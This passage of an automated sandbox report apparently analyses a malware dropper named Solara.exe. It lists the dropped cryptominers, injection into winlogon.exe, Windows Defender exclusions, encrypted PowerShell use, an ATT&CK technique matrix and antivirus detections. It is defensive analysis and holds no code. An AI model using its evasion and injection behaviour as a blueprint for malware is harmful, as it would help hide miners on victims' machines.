Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\dialer.exe | Code function: 51_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, | 51_2_0000000140001B54
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Code function: 19_2_0000027E82477960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, | 19_2_0000027E82477960
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK matrix (a number before a technique is the badge shown for that cell):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 Credential API Hooking | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 11 Native API | 1 Windows Service | 1 Access Token Manipulation | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | 1 Credential API Hooking | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 12 Command and Scripting Interpreter | Logon Script (Windows) | 1 Windows Service | 1 Obfuscated Files or Information | Security Account Manager | 43 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 1 Service Execution | Login Hook | 512 Process Injection | 1 Timestomp | NTDS | 23 Security Software Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | 1 PowerShell | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 4 Rootkit | Cached Domain Credentials | 41 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 41 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Access Token Manipulation | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 512 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 Hidden Files and Directories | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
Behavior Graph ID: 1585410 | Sample: Solara.exe | Start date: 07/01/2025 | Architecture: WINDOWS | Score: 100
Contacted hosts: raw.githubusercontent.com, github.com, 2 other IPs or domains
Sample-level signatures: Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for dropped file; 12 other signatures

Process tree (dropped files, signatures and child processes per node):

Solara.exe
    dropped: C:\Users\user\AppData\Local\Temp\xmr.exe (PE32+); C:\Users\user\AppData\Local\Temp\eth.exe (PE32+); C:\Users\user\...\Solara Bootstrapper.exe (PE32)
    signatures: Encrypted powershell cmdline option found
    Solara Bootstrapper.exe
        dropped: C:\Users\user\AppData\Local\Temp\kx new.exe (PE32); C:\Users\user\...\SolaraBootstrapper.exe (PE32)
        signatures: Encrypted powershell cmdline option found
        kx new.exe
            dropped: C:\Users\user\AppData\Local\...\xmr new.exe (PE32+); C:\Users\user\AppData\...\Kawpow new.exe (PE32+)
            signatures: Encrypted powershell cmdline option found
            xmr new.exe
                dropped: C:\ProgramData\...\eejhedztifcv.exe (PE32+)
                signatures: Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
                powershell.exe -> conhost.exe
                cmd.exe -> conhost.exe, wusa.exe
                sc.exe -> conhost.exe
                3 other processes -> conhost.exe, conhost.exe, conhost.exe
            2 other processes
                signatures: Loading BitLocker PowerShell Module
                powershell.exe (Loading BitLocker PowerShell Module) -> conhost.exe
                conhost.exe
        SolaraBootstrapper.exe
            network: github.com 140.82.121.4, 443, 49704, 49706 GITHUBUS United States; raw.githubusercontent.com 185.199.108.133, 443, 49705 FASTLYUS Netherlands
            signatures: Multi AV Scanner detection for dropped file
            conhost.exe
        powershell.exe -> conhost.exe
    xmr.exe
        dropped: C:\ProgramData\...\lrgkmixyjzta.exe (PE32+)
        signatures: Multi AV Scanner detection for dropped file; Modifies the context of a thread in another process (thread injection); Adds a directory exclusion to Windows Defender
        dialer.exe
            signatures: Contains functionality to inject code into remote processes; Writes to foreign memory regions; Allocates memory in foreign processes; 2 other signatures
            injected: winlogon.exe
        powershell.exe -> conhost.exe
        10 other processes -> 11 other processes
    eth.exe
        powershell.exe (Loading BitLocker PowerShell Module) -> conhost.exe
        11 other processes -> 11 other processes
    powershell.exe
        signatures: Loading BitLocker PowerShell Module
        conhost.exe
lrgkmixyjzta.exe
    signatures: Multi AV Scanner detection for dropped file

Source | Detection | Scanner | Label
Solara.exe | 68% | ReversingLabs | Win32.Dropper.Dapato
Solara.exe | 100% | Avira | TR/Dropper.Gen
Solara.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | 100% | Avira | TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\kx new.exe | 100% | Avira | TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | 100% | Joe Sandbox ML |
